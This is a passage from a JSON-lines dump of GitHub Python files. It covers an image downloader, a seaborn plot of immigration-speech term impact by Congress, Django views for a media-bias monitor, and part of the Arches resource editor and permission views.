replace_token_to_pwd(base_config, token)\n print(config)\n config_path = os.path.join(os.getcwd(), \"config.json\")\n json.dump(config, open(config_path,'w'), ensure_ascii=False)\n","repo_name":"mistake0316/AIA_VC","sub_path":"gen_config.py","file_name":"gen_config.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"39967865948","text":"import openpyxl\nimport os\nimport urllib.request\n\nfile_name = '打卡情况.xlsx'\n\n\ndef download(img_url):\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\"}\n request = urllib.request.Request(img_url, headers=head)\n try:\n response = urllib.request.urlopen(request)\n img_name = 'dd.png'\n path = \".\\\\\" + img_name\n if response.getcode() == 200:\n with open(path, 'wb') as f:\n f.write(response.read())\n return path\n except:\n return 'failed'\n\n\nif __name__ == '__main__':\n main_book = openpyxl.load_workbook('test(收集结果)_20220224.xlsx')\n main_sheet = main_book.active\n print(type(main_sheet.cell(2, 4).hyperlink.target))\n download(\"https://docimg10.docs.qq.com/image/OWINGk49ZusyQD2pdKNyog.jpeg?w=1152&h=2376&_type=jpeg\")\n","repo_name":"skyTEAM-w/Pack-Imagines","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28892875017","text":"import os\nimport json\nfrom optparse import OptionParser\nfrom collections import defaultdict, Counter\n\nimport seaborn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom time_periods.common import congress_to_year\n\n\ndef main():\n usage = \"%prog\"\n parser = OptionParser(usage=usage)\n parser.add_option('--test-file', type=str, default='data/speeches/Congress/linear/test.tokenized.jsonlist',\n help='Test file: default=%default')\n parser.add_option('--weight-file', type=str, default='data/speeches/Congress/linear/weights.nontest.npz',\n help='Weight file: default=%default')\n parser.add_option('--outdir', type=str, default='plots/',\n help='Weight file: default=%default')\n\n (options, args) = parser.parse_args()\n\n test_file = options.test_file\n weight_file = options.weight_file\n outdir = options.outdir\n add_labels = True\n\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n stopwords = {}\n\n with open(test_file) as f:\n lines = f.readlines()\n lines = [json.loads(line) for line in lines]\n data = np.load(weight_file)\n\n pro_counters_by_congress = defaultdict(Counter)\n anti_counters_by_congress = defaultdict(Counter)\n tone_counters_by_congress = defaultdict(Counter)\n for line in lines:\n congress = int(line['congress'])\n tone = line['tone']\n for sent in line['tokens']:\n tokens = [t for t in sent if t == t.lower()]\n tone_counters_by_congress[congress].update(tokens)\n if tone == 'pro':\n pro_counters_by_congress[congress].update(tokens)\n elif tone == 'anti':\n anti_counters_by_congress[congress].update(tokens)\n\n print(list(data.keys()))\n vocab = data['vocab']\n weights = data['weights']\n vocab_size = len(vocab)\n n_congesses = len(pro_counters_by_congress)\n print(vocab_size, n_congesses)\n print(weights.shape)\n vocab_index = dict(zip(vocab, range(vocab_size)))\n\n pro_freq_by_congress = defaultdict(Counter)\n anti_freq_by_congress = defaultdict(Counter)\n tone_freq_by_congress = defaultdict(Counter)\n congresses = sorted(pro_counters_by_congress)\n pro_sum_by_congress = Counter()\n anti_sum_by_congress = Counter()\n tone_sum_by_congress = Counter()\n for congress in congresses:\n tone_sum = sum(tone_counters_by_congress[congress].values())\n tone_freq_by_congress[congress] = Counter({t: v / tone_sum for t, v in tone_counters_by_congress[congress].items()})\n tone_sum_by_congress[congress] = tone_sum\n pro_sum = sum(pro_counters_by_congress[congress].values())\n pro_freq_by_congress[congress] = Counter({t: v / pro_sum for t, v in pro_counters_by_congress[congress].items()})\n pro_sum_by_congress[congress] = pro_sum\n anti_sum = sum(anti_counters_by_congress[congress].values())\n anti_freq_by_congress[congress] = Counter({t: v / anti_sum for t, v in anti_counters_by_congress[congress].items()})\n anti_sum_by_congress[congress] = anti_sum\n\n pro_weights_by_congress = np.zeros([vocab_size, n_congesses])\n pro_freqs_by_congress_np = np.zeros([vocab_size, n_congesses])\n pro_impacts_by_congress = np.zeros([vocab_size, n_congesses])\n anti_weights_by_congress = np.zeros([vocab_size, n_congesses])\n anti_freqs_by_congress_np = np.zeros([vocab_size, n_congesses])\n anti_impacts_by_congress = np.zeros([vocab_size, n_congesses])\n n_found = 0\n for c_i, congress in enumerate(congresses):\n for t_i, term in enumerate(vocab):\n parts = term.split('__')\n if len(parts) == 1:\n pro_freq = pro_freq_by_congress[congress][term]\n anti_freq = anti_freq_by_congress[congress][term]\n weight = weights[0, t_i]\n decorated = term + '__' + str(congress)\n if decorated in vocab_index:\n weight += weights[0, vocab_index[decorated]]\n n_found += 1\n pro_weights_by_congress[t_i, c_i] = weight\n pro_freqs_by_congress_np[t_i, c_i] = pro_freq\n pro_impacts_by_congress[t_i, c_i] = weight * pro_freq\n anti_weights_by_congress[t_i, c_i] = -weight\n anti_freqs_by_congress_np[t_i, c_i] = anti_freq\n anti_impacts_by_congress[t_i, c_i] = -weight * anti_freq\n\n n_words, n_congresses = pro_impacts_by_congress.shape\n extended = np.zeros([n_words, n_congresses+4])\n extended_freq = np.zeros([n_words, n_congresses+4])\n totals = np.zeros(n_congresses+4)\n for i in range(5):\n extended[:, i:i+n_congresses] += pro_impacts_by_congress\n extended_freq[:, i:i+n_congresses] += pro_freqs_by_congress_np\n totals[i:i+n_congresses] += 1\n pro_impacts_by_congress_smoothed = extended[:, 2:-2] / totals[2:-2]\n\n n_words, n_congresses = anti_impacts_by_congress.shape\n extended = np.zeros([n_words, n_congresses+4])\n extended_freq = np.zeros([n_words, n_congresses+4])\n totals = np.zeros(n_congresses+4)\n for i in range(5):\n extended[:, i:i+n_congresses] += anti_impacts_by_congress\n extended_freq[:, i:i+n_congresses] += anti_freqs_by_congress_np\n totals[i:i+n_congresses] += 1\n anti_impacts_by_congress_smoothed = extended[:, 2:-2] / totals[2:-2]\n\n min_pro_impacts = np.min(pro_impacts_by_congress_smoothed, axis=1)\n median_pro_impacts = np.median(pro_impacts_by_congress_smoothed, axis=1)\n max_pro_impacts = np.max(pro_impacts_by_congress_smoothed, axis=1)\n median_pro_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(median_pro_impacts)])\n max_pro_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(max_pro_impacts)])\n\n min_anti_impacts = np.min(anti_impacts_by_congress, axis=1)\n median_anti_impacts = np.median(anti_impacts_by_congress_smoothed, axis=1)\n max_anti_impacts = np.max(anti_impacts_by_congress_smoothed, axis=1)\n median_anti_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(median_anti_impacts)])\n max_anti_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(max_anti_impacts)])\n\n seaborn.reset_orig()\n seaborn.set(font_scale=1.35)\n seaborn.set_palette('Paired')\n\n fig, ax = plt.subplots(nrows=2, figsize=(10, 7))\n plt.subplots_adjust(hspace=0.3)\n\n topn = 12\n years = [congress_to_year(c) for c in congresses]\n\n order = np.argsort(max_pro_impacts)[::-1]\n for i in order[:topn]:\n print(vocab[i], min_pro_impacts[i], median_pro_impacts[i], max_pro_impacts[i])\n\n indices = [i for i in order[:topn]]\n\n rows = [np.maximum(np.zeros_like(pro_impacts_by_congress_smoothed[i, :]), pro_impacts_by_congress_smoothed[i, :]) for i in indices]\n labels = [vocab[i] for i in indices]\n\n matrix = np.vstack(rows)\n sums = matrix.sum(0)\n matrix = matrix / sums\n\n ax[0].stackplot(years, matrix, labels=labels, alpha=0.8)\n\n if add_labels:\n ax[0].text(1943, 0.92, labels[11], color='white', fontsize=11)\n ax[0].text(2012, 0.87, labels[10], color='k', fontsize=7)\n ax[0].text(1892, 0.89, labels[9], color='white', fontsize=9)\n ax[0].text(1963, 0.78, labels[8], color='k', fontsize=11)\n ax[0].text(1915, 0.78, labels[7], color='white', fontsize=14)\n ax[0].text(1900, 0.59, labels[6], color='k', fontsize=14)\n ax[0].text(1935, 0.57, labels[5], color='white', fontsize=14)\n ax[0].text(1985, 0.7, labels[4], color='k', fontsize=12)\n ax[0].text(1988, 0.53, labels[3], color='white', fontsize=14)\n ax[0].text(1898, 0.11, labels[2], color='k', fontsize=13)\n ax[0].text(2005, 0.14, labels[1], color='white', fontsize=14)\n ax[0].text(1960, 0.1, labels[0], color='k', fontsize=16)\n else:\n ax[0].legend(loc='upper left', bbox_to_anchor=(1,1))\n handles, labels = ax[0].get_legend_handles_labels()\n ax[0].legend(handles[::-1], labels[::-1], loc='upper left', bbox_to_anchor=(1, 1))\n\n ax[0].set_title('Pro-immigration terms')\n ax[0].set_ylabel('Normalized impact')\n\n order = np.argsort(max_anti_impacts)[::-1]\n for i in order[:topn]:\n print(vocab[i], min_anti_impacts[i], median_anti_impacts[i], max_anti_impacts[i])\n\n indices = [i for i in order[:topn]]\n\n rows = [np.maximum(np.zeros_like(anti_impacts_by_congress_smoothed[i, :]), anti_impacts_by_congress_smoothed[i, :]) for i in indices]\n labels = [vocab[i] for i in indices]\n\n matrix = np.vstack(rows)\n sums = matrix.sum(0)\n matrix = matrix / sums\n\n ax[1].stackplot(years, matrix, labels=labels, alpha=0.8)\n\n if add_labels:\n ax[1].text(2007, 0.96, labels[11], color='white', fontsize=8)\n ax[1].text(1943, 0.93, labels[10], color='k', fontsize=12)\n ax[1].text(1959, 0.8, labels[9], color='white', fontsize=9)\n ax[1].text(2000, 0.87, labels[8], color='k', fontsize=8)\n ax[1].text(1921, 0.75, labels[7], color='white', fontsize=14)\n ax[1].text(1947, 0.73, labels[6], color='k', fontsize=9)\n ax[1].text(1943, 0.62, labels[5], color='white', fontsize=12)\n ax[1].text(1914, 0.58, labels[4], color='k', fontsize=11)\n ax[1].text(1882, 0.35, labels[3], color='white', fontsize=14)\n ax[1].text(1933, 0.23, labels[2], color='k', fontsize=16)\n ax[1].text(2005, 0.4, labels[1], color='white', fontsize=15)\n ax[1].text(1978, 0.13, labels[0], color='k', fontsize=16)\n else:\n ax[1].legend(loc='upper left', bbox_to_anchor=(1,1))\n handles, labels = ax[1].get_legend_handles_labels()\n ax[1].legend(handles[::-1], labels[::-1], loc='upper left', bbox_to_anchor=(1, 1))\n\n ax[1].set_title('Anti-immigration terms')\n ax[1].set_ylabel('Normalized impact')\n\n for k in range(2):\n ax[k].set_xlim(1880, 2020)\n ax[k].set_ylim(0, 1)\n\n if add_labels:\n plt.savefig(os.path.join(outdir, 'tone_linear_impact_with_labels.pdf'), bbox_inches='tight')\n plt.savefig(os.path.join(outdir, 'tone_linear_impact_with_labels.png'), bbox_inches='tight')\n else:\n plt.savefig(os.path.join(outdir, 'tone_linear_impact.pdf'), bbox_inches='tight')\n plt.savefig(os.path.join(outdir, 'tone_linear_impact.png'), bbox_inches='tight')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dallascard/immigration-speeches","sub_path":"plotting/make_tone_impact_plot.py","file_name":"make_tone_impact_plot.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26572860381","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Article,Blog_Post # Import your model for data storage\nimport threading\nimport time\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import ArticleSerializer\nfrom .rss_scraper import gather_data\nfrom .entity_manager import update_database\n\n\ndef print_value(request):\n if request.method == 'POST':\n submitted_value = request.POST.get('expression', '')\n # You can print the value or perform any other action here\n print(submitted_value)\n return HttpResponse(submitted_value)\n\n\ndef rss_test(request):\n titles = gather_data()\n return render(request,'rss_titles.html', {'titles': titles})\n\ndef get_terms_on_sites(request):\n if request.method == 'GET':\n submitted_values = request.GET.getlist('expression') # Get a list of submitted expressions\n\n\n articles = Article.objects.filter(term__in=submitted_values) # Retrieve articles with terms in the submitted list\n\n return render(request, 'articles.html', {'articles': articles})\n\n return HttpResponse(\"Form submitted successfully\")\n\n\ndef view_articles(request):\n if request.method == 'GET':\n submitted_value = request.GET.get('expression', '')\n articles = Article.objects.filter(term=submitted_value) # Retrieve all articles from the database\n return render(request, 'articles.html', {'articles': articles})\n return HttpResponse(\"Form submitted successfully\")\n\n\ndef periodic_task():\n while True:\n update_database() # Call your function\n time.sleep(900) # Sleep for 5 minutes (300 seconds)\n\n\ndef start_periodic_task(request):\n periodic_thread = threading.Thread(target=periodic_task)\n periodic_thread.daemon = True # This ensures the thread terminates when the main program does\n periodic_thread.start()\n return HttpResponse(\"Adatbázis frissítése\")\n\n\ndef list_entries(request):\n entries = Blog_Post.objects.all()\n return render(request, 'entry_list.html', {'entries': entries})\n\n\ndef index(request):\n entries = Blog_Post.objects.all()\n return render(request, 'index.html',{'entries': entries})\n\n\nclass ArticleList(APIView):\n def get(self, request):\n articles = Article.objects.all()\n serializer = ArticleSerializer(articles, many=True)\n return Response(serializer.data)\n","repo_name":"hartvigmarton/mediaBiasMonitor","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72397396090","text":"import json\nimport uuid\n\nfrom distutils.util import strtobool\n\nfrom django.core.exceptions import ObjectDoesNotExist, PermissionDenied\nfrom django.contrib.auth.models import User, Group, Permission\nfrom django.db import transaction\nfrom django.forms.models import model_to_dict\nfrom django.http import HttpResponseNotFound\nfrom django.http import HttpResponse\nfrom django.http import Http404\nfrom django.http import HttpResponseBadRequest, JsonResponse\nfrom django.shortcuts import redirect, render\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import gettext as _\nfrom django.views.generic import View\nfrom django.utils import translation\n\nfrom arches.app.models import models\nfrom arches.app.models.card import Card\nfrom arches.app.models.graph import Graph\nfrom arches.app.models.tile import Tile\nfrom arches.app.models.resource import Resource, PublishedModelError\nfrom arches.app.models.system_settings import settings\nfrom arches.app.utils.activity_stream_jsonld import ActivityStreamCollection\nfrom arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer\nfrom arches.app.utils.decorators import group_required\nfrom arches.app.utils.decorators import can_edit_resource_instance\nfrom arches.app.utils.decorators import can_delete_resource_instance\nfrom arches.app.utils.decorators import can_read_resource_instance\nfrom arches.app.utils.i18n import LanguageSynchronizer, localize_complex_input\nfrom arches.app.utils.pagination import get_paginator\nfrom arches.app.utils.permission_backend import (\n user_is_resource_editor,\n user_is_resource_reviewer,\n user_can_delete_resource,\n user_can_edit_resource,\n user_can_read_resource,\n)\nfrom arches.app.utils.response import JSONResponse, JSONErrorResponse\nfrom arches.app.search.search_engine_factory import SearchEngineFactory\nfrom arches.app.search.elasticsearch_dsl_builder import Query, Terms\nfrom arches.app.search.mappings import RESOURCES_INDEX\nfrom arches.app.views.base import BaseManagerView, MapBaseManagerView\nfrom arches.app.views.concept import Concept\nfrom arches.app.datatypes.datatypes import DataTypeFactory\nfrom elasticsearch import Elasticsearch\nfrom guardian.shortcuts import (\n assign_perm,\n get_perms,\n remove_perm,\n get_group_perms,\n get_user_perms,\n get_groups_with_perms,\n get_users_with_perms,\n get_perms_for_model,\n)\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceListView(BaseManagerView):\n def get(self, request, graphid=None, resourceid=None):\n context = self.get_context_data(main_script=\"views/resource\")\n\n context[\"nav\"][\"icon\"] = \"fa fa-bookmark\"\n context[\"nav\"][\"title\"] = _(\"Resource Manager\")\n context[\"nav\"][\"login\"] = True\n context[\"nav\"][\"help\"] = {\"title\": _(\"Creating Resources\"), \"templates\": [\"resource-editor-landing-help\"]}\n\n return render(request, \"views/resource.htm\", context)\n\n\ndef get_resource_relationship_types():\n resource_relationship_types = Concept().get_child_collections(\"00000000-0000-0000-0000-000000000005\")\n default_relationshiptype_valueid = None\n for relationship_type in resource_relationship_types:\n if relationship_type[0] == \"00000000-0000-0000-0000-000000000007\":\n default_relationshiptype_valueid = relationship_type[2]\n relationship_type_values = {\n \"values\": [{\"id\": str(c[2]), \"text\": str(c[1])} for c in resource_relationship_types],\n \"default\": str(default_relationshiptype_valueid),\n }\n return relationship_type_values\n\n\ndef get_instance_creator(resource_instance, user=None):\n creatorid = None\n can_edit = None\n if models.EditLog.objects.filter(resourceinstanceid=resource_instance.resourceinstanceid).filter(edittype=\"create\").exists():\n creatorid = (\n models.EditLog.objects.filter(resourceinstanceid=resource_instance.resourceinstanceid).filter(edittype=\"create\")[0].userid\n )\n if creatorid is None or creatorid == \"\":\n creatorid = settings.DEFAULT_RESOURCE_IMPORT_USER[\"userid\"]\n if user:\n can_edit = user.id == int(creatorid) or user.is_superuser\n return {\"creatorid\": creatorid, \"user_can_edit_instance_permissions\": can_edit}\n\n\n@method_decorator(group_required(\"Resource Editor\"), name=\"dispatch\")\nclass ResourceEditorView(MapBaseManagerView):\n action = None\n\n @method_decorator(can_edit_resource_instance, name=\"dispatch\")\n def get(\n self,\n request,\n graphid=None,\n resourceid=None,\n view_template=\"views/resource/editor.htm\",\n main_script=\"views/resource/editor\",\n nav_menu=True,\n ):\n if self.action == \"copy\":\n return self.copy(request, resourceid)\n\n creator = None\n user_created_instance = None\n\n languages = models.Language.objects.all()\n\n def prepare_tiledata(tile, nodes):\n datatype_factory = DataTypeFactory()\n datatype_lookup = {str(node.nodeid): datatype_factory.get_instance(node.datatype) for node in nodes}\n for nodeid in tile.data.keys():\n datatype = datatype_lookup[nodeid]\n datatype.pre_structure_tile_data(tile, nodeid, languages=languages)\n\n def add_i18n_to_cardwidget_defaults(cardwidgets):\n serialized_cardwidgets = JSONSerializer().serializeToPython(cardwidgets)\n\n for cardwidget in serialized_cardwidgets:\n if cardwidget[\"widget_id\"] in [\"10000000-0000-0000-0000-000000000005\", \"10000000-0000-0000-0000-000000000001\"]:\n try:\n default_value = cardwidget[\"config\"][\"defaultValue\"]\n except KeyError:\n default_value = None\n if default_value is None:\n existing_languages = []\n cardwidget[\"config\"][\"defaultValue\"] = {}\n elif type(default_value) is str:\n default_language = languages.get(code=settings.LANGUAGE_CODE)\n cardwidget[\"config\"][\"defaultValue\"] = {\n settings.LANGUAGE_CODE: {\"value\": default_value, \"direction\": default_language.default_direction}\n }\n existing_languages = [settings.LANGUAGE_CODE]\n else:\n existing_languages = list(default_value.keys())\n for language in languages:\n if language.code not in existing_languages:\n cardwidget[\"config\"][\"defaultValue\"][language.code] = {\"value\": \"\", \"direction\": language.default_direction}\n return serialized_cardwidgets\n\n def add_i18n_to_widget_defaults(widgets):\n for widget in widgets:\n if widget.datatype == \"string\":\n existing_languages = []\n default_value = widget.defaultconfig[\"defaultValue\"]\n if default_value != \"\" and default_value is not None:\n existing_languages = list(default_value.keys())\n for language in languages:\n if language.code not in existing_languages:\n widget.defaultconfig[\"defaultValue\"][language.code] = {\n \"value\": \"\",\n \"direction\": language.default_direction,\n }\n return widgets\n\n if resourceid is None:\n resource_instance = None\n graph = models.GraphModel.objects.get(pk=graphid)\n resourceid = \"\"\n else:\n resource_instance = Resource.objects.get(pk=resourceid)\n graph = resource_instance.graph\n instance_creator = get_instance_creator(resource_instance, request.user)\n creator = instance_creator[\"creatorid\"]\n user_created_instance = instance_creator[\"user_can_edit_instance_permissions\"]\n\n\n ontologyclass = None\n nodegroups = []\n editable_nodegroups = []\n\n nodes = graph.node_set.all().select_related(\"nodegroup\")\n for node in nodes:\n if node.istopnode and not ontologyclass:\n ontologyclass = node.ontologyclass\n\n if node.is_collector:\n added = False\n\n if request.user.has_perm(\"write_nodegroup\", node.nodegroup):\n editable_nodegroups.append(node.nodegroup)\n nodegroups.append(node.nodegroup)\n added = True\n\n if not added and request.user.has_perm(\"read_nodegroup\", node.nodegroup):\n nodegroups.append(node.nodegroup)\n\n primary_descriptor_functions = models.FunctionXGraph.objects.filter(graph=graph).filter(function__functiontype=\"primarydescriptors\")\n primary_descriptor_function = JSONSerializer().serialize(\n primary_descriptor_functions[0] if len(primary_descriptor_functions) > 0 else None\n )\n user_is_reviewer = user_is_resource_reviewer(request.user)\n is_system_settings = False\n if resource_instance is None:\n tiles = []\n displayname = _(\"New Resource\")\n else:\n displayname = resource_instance.displayname()\n if displayname == \"undefined\":\n displayname = _(\"Unnamed Resource\")\n if str(resource_instance.graph_id) == settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID:\n is_system_settings = True\n displayname = _(\"System Settings\")\n\n tiles = resource_instance.tilemodel_set.order_by(\"sortorder\").filter(nodegroup__in=nodegroups)\n provisionaltiles = []\n for tile in tiles:\n append_tile = True\n isfullyprovisional = False\n if tile.provisionaledits is not None:\n if len(list(tile.provisionaledits.keys())) > 0:\n if len(tile.data) == 0:\n isfullyprovisional = True\n if user_is_reviewer is False:\n if str(request.user.id) in tile.provisionaledits:\n tile.provisionaledits = {str(request.user.id): tile.provisionaledits[str(request.user.id)]}\n tile.data = tile.provisionaledits[str(request.user.id)][\"value\"]\n else:\n if isfullyprovisional is True:\n # if the tile IS fully provisional and the current user is not the owner,\n # we don't send that tile back to the client.\n append_tile = False\n else:\n # if the tile has authoritaive data and the current user is not the owner,\n # we don't send the provisional data of other users back to the client.\n tile.provisionaledits = None\n if append_tile is True:\n provisionaltiles.append(tile)\n tiles = provisionaltiles\n for tile in tiles:\n prepare_tiledata(tile, nodes)\n\n serialized_graph = None\n if graph.publication:\n try:\n published_graph = graph.get_published_graph()\n except models.PublishedGraph.DoesNotExist:\n LanguageSynchronizer.synchronize_settings_with_db()\n published_graph = graph.get_published_graph()\n\n serialized_graph = published_graph.serialized_graph\n\n if serialized_graph:\n serialized_cards = serialized_graph[\"cards\"]\n cardwidgets = [\n models.CardXNodeXWidget(**card_x_node_x_widget_dict) for card_x_node_x_widget_dict in serialized_graph[\"widgets\"]\n ]\n else:\n cards = graph.cardmodel_set.order_by(\"sortorder\").filter(nodegroup__in=nodegroups).prefetch_related(\"cardxnodexwidget_set\")\n serialized_cards = JSONSerializer().serializeToPython(cards)\n cardwidgets = []\n for card in cards:\n cardwidgets += list(card.cardxnodexwidget_set.order_by(\"sortorder\").all())\n\n updated_cardwidgets = add_i18n_to_cardwidget_defaults(cardwidgets)\n\n widgets = list(models.Widget.objects.all())\n updated_widgets = add_i18n_to_widget_defaults(widgets)\n\n card_components = models.CardComponent.objects.all()\n templates = models.ReportTemplate.objects.all()\n\n editable_nodegroup_ids = [str(nodegroup.pk) for nodegroup in editable_nodegroups]\n for card in serialized_cards:\n card[\"is_writable\"] = False\n if str(card[\"nodegroup_id\"]) in editable_nodegroup_ids:\n card[\"is_writable\"] = True\n\n context = self.get_context_data(\n main_script=main_script,\n resourceid=resourceid,\n displayname=displayname,\n graphid=graph.graphid,\n graphiconclass=graph.iconclass,\n graphname=graph.name,\n ontologyclass=ontologyclass,\n resource_graphs=(\n models.GraphModel.objects.exclude(pk=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID)\n .exclude(isresource=False)\n .exclude(publication=None)\n ),\n relationship_types=get_resource_relationship_types(),\n widgets=updated_widgets,\n widgets_json=JSONSerializer().serialize(updated_widgets),\n card_components=card_components,\n card_components_json=JSONSerializer().serialize(card_components),\n tiles=JSONSerializer().serialize(tiles),\n cards=JSONSerializer().serialize(serialized_cards),\n primary_descriptor_function=primary_descriptor_function,\n applied_functions=JSONSerializer().serialize(models.FunctionXGraph.objects.filter(graph=graph)),\n nodegroups=JSONSerializer().serialize(nodegroups),\n nodes=JSONSerializer().serialize(nodes.filter(nodegroup__in=nodegroups)),\n cardwidgets=JSONSerializer().serialize(updated_cardwidgets),\n datatypes_json=JSONSerializer().serialize(models.DDataType.objects.all(), exclude=[\"iconclass\", \"modulename\", \"classname\"]),\n map_markers=models.MapMarker.objects.all(),\n geocoding_providers=models.Geocoder.objects.all(),\n user_is_reviewer=json.dumps(user_is_reviewer),\n user_can_delete_resource=user_can_delete_resource(request.user, resourceid),\n creator=json.dumps(creator),\n user_created_instance=json.dumps(user_created_instance),\n report_templates=templates,\n templates_json=JSONSerializer().serialize(templates, sort_keys=False, exclude=[\"name\", \"description\"]),\n graph_json=JSONSerializer().serialize(graph),\n is_system_settings=is_system_settings,\n )\n\n context[\"nav\"][\"title\"] = \"\"\n context[\"nav\"][\"menu\"] = nav_menu\n \n if resourceid not in (None, \"\"):\n context[\"nav\"][\"report_view\"] = True\n\n if resourceid == settings.RESOURCE_INSTANCE_ID:\n context[\"nav\"][\"help\"] = {\"title\": _(\"Managing System Settings\"), \"templates\": [\"system-settings-help\"]}\n else:\n context[\"nav\"][\"help\"] = {\"title\": _(\"Using the Resource Editor\"), \"templates\": [\"resource-editor-help\"]}\n\n return render(request, view_template, context)\n\n def delete(self, request, resourceid=None):\n delete_error = _(\"Unable to Delete Resource\")\n delete_msg = _(\"User does not have permissions to delete this instance because the instance or its data is restricted\")\n try:\n if resourceid is not None:\n if user_can_delete_resource(request.user, resourceid) is False:\n return JSONErrorResponse(delete_error, delete_msg)\n ret = Resource.objects.get(pk=resourceid)\n try:\n deleted = ret.delete(user=request.user)\n except PublishedModelError as e:\n message = _(\"Unable to delete. Please verify the model is not currently published.\")\n return JSONResponse({\"status\": \"false\", \"message\": [_(e.title), _(str(message))]}, status=500)\n except PermissionDenied:\n return JSONErrorResponse(delete_error, delete_msg)\n if deleted is True:\n return JSONResponse(ret)\n else:\n return JSONErrorResponse(delete_error, delete_msg)\n return HttpResponseNotFound()\n except PermissionDenied:\n return JSONErrorResponse(delete_error, delete_msg)\n\n\n def copy(self, request, resourceid=None):\n resource_instance = Resource.objects.get(pk=resourceid)\n resource = resource_instance.copy()\n return JSONResponse({\"resourceid\": resource.resourceinstanceid})\n\n\n@method_decorator(group_required(\"Resource Editor\"), name=\"dispatch\")\nclass ResourcePermissionDataView(View):\n perm_cache = {}\n action = None\n\n def get(self, request):\n resourceid = request.GET.get(\"instanceid\", None)\n resource_instance = models.ResourceInstance.objects.get(pk=resourceid)\n result = self.get_instance_permissions(resource_instance)\n return JSONResponse(result)\n\n def post(self, request):\n resourceid = request.POST.get(\"instanceid\", None)\n action = request.POST.get(\"action\", None)\n graphid = request.POST.get(\"graphid\", None)\n result = None\n if action == \"restrict\":\n result = self.make_instance_private(resourceid, graphid)\n elif action == \"open\":\n result = self.make_instance_public(resourceid, graphid)\n else:\n data = JSONDeserializer().deserialize(request.body)\n self.apply_permissions(data, request.user)\n if \"instanceid\" in data:\n resource = models.ResourceInstance.objects.get(pk=data[\"instanceid\"])\n result = self.get_instance_permissions(resource)\n return JSONResponse(result)\n\n def delete(self, request):\n data = JSONDeserializer().deserialize(request.body)\n self.apply_permissions(data, request.user, revert=True)\n return JSONResponse(data)\n\n def get_perms(self, identity, type, obj, perms):\n if type == \"user\":\n identity_perms = get_user_perms(identity, obj)\n else:\n identity_perms = get_group_perms(identity, obj)\n res = []\n for perm in identity_perms:\n res += list(filter(lambda x: (x[\"codename\"] == perm), perms))\n return res\n\n def get_instance_permissions(self, resource_instance):\n permission_order = [\"view_resourceinstance\", \"change_resourceinstance\", \"delete_resourceinstance\", \"no_access_to_resourceinstance\"]\n perms = json.loads(\n JSONSerializer().serialize(\n {p.codename: p for p in get_perms_for_model(resource_instance) if p.codename != \"add_resourceinstance\"}\n )\n )\n ordered_perms = []\n for p in permission_order:\n ordered_perms.append(perms[p])\n identities = [\n {\n \"name\": user.username,\n \"id\": user.id,\n \"type\": \"user\",\n \"default_permissions\": self.get_perms(user, \"user\", resource_instance, ordered_perms),\n \"is_editor_or_reviewer\": bool(user_is_resource_editor(user) or user_is_resource_reviewer(user)),\n }\n for user in User.objects.all()\n ]\n identities += [\n {\n \"name\": group.name,\n \"id\": group.id,\n \"type\": \"group\",\n \"default_permissions\": self.get_perms(group, \"group\", resource_instance, ordered_perms),\n }\n for group in Group.objects.all()\n ]\n result = {\"identities\": identities}\n result[\"permissions\"] = ordered_perms\n result[\"limitedaccess\"] = (len(get_users_with_perms(resource_instance)) + len(get_groups_with_perms(resource_instance))) > 1\n instance_creator = get_instance_creator(resource_instance)\n result[\"creatorid\"] = instance_creator[\"creatorid\"]\n return result\n\n def make_instance_private(self, resourceinstanceid, graphid=None):\n resource = Resource(resourceinstanceid)\n resource_instance = models.ResourceInstance.objects.get(pk=resourceinstanceid)\n resource.graph_id = graphid if graphid else str(resource_instance.graph_id)\n resource.createdtime = resource_instance.createdtime\n resource.add_permission_to_all(\"no_access_to_resourceinstance\")\n instance_creator = get_instance_creator(resource)\n user = User.objects.get(pk=instance_creator[\"creatorid\"])\n assign_perm(\"view_resourceinstance\", user, resource)\n assign_perm(\"change_resourceinstance\", user, resource)\n assign_perm(\"delete_resourceinstance\", user, resource)\n remove_perm(\"no_access_to_resourceinstance\", user, resource)\n return self.get_instance_permissions(resource)\n\n def make_instance_public(self, resourceinstanceid, graphid=None):\n resource = Resource(resourceinstanceid)\n resource_instance = models.ResourceInstance.objects.get(pk=resourceinstanceid)\n resource.graph_id = graphid if graphid else str(resource_instance.graph_id)\n resource.createdtime = resource_instance.createdtime\n resource.remove_resource_instance_permissions()\n return self.get_instance_permissions(resource)\n\n def apply_permissions(self, data, user, revert=False):\n with transaction.atomic():\n for instance in data[\"selectedInstances\"]:\n resource_instance = models.ResourceInstance.objects.get(pk=instance[\"resourceinstanceid\"])\n for identity in data[\"selectedIdentities\"]:\n if identity[\"type\"] == \"group\":\n identityModel = Group.objects.get(pk=identity[\"id\"])\n else:\n identityModel = User.objects.get(pk=identity[\"id\"])\n\n instance_creator = 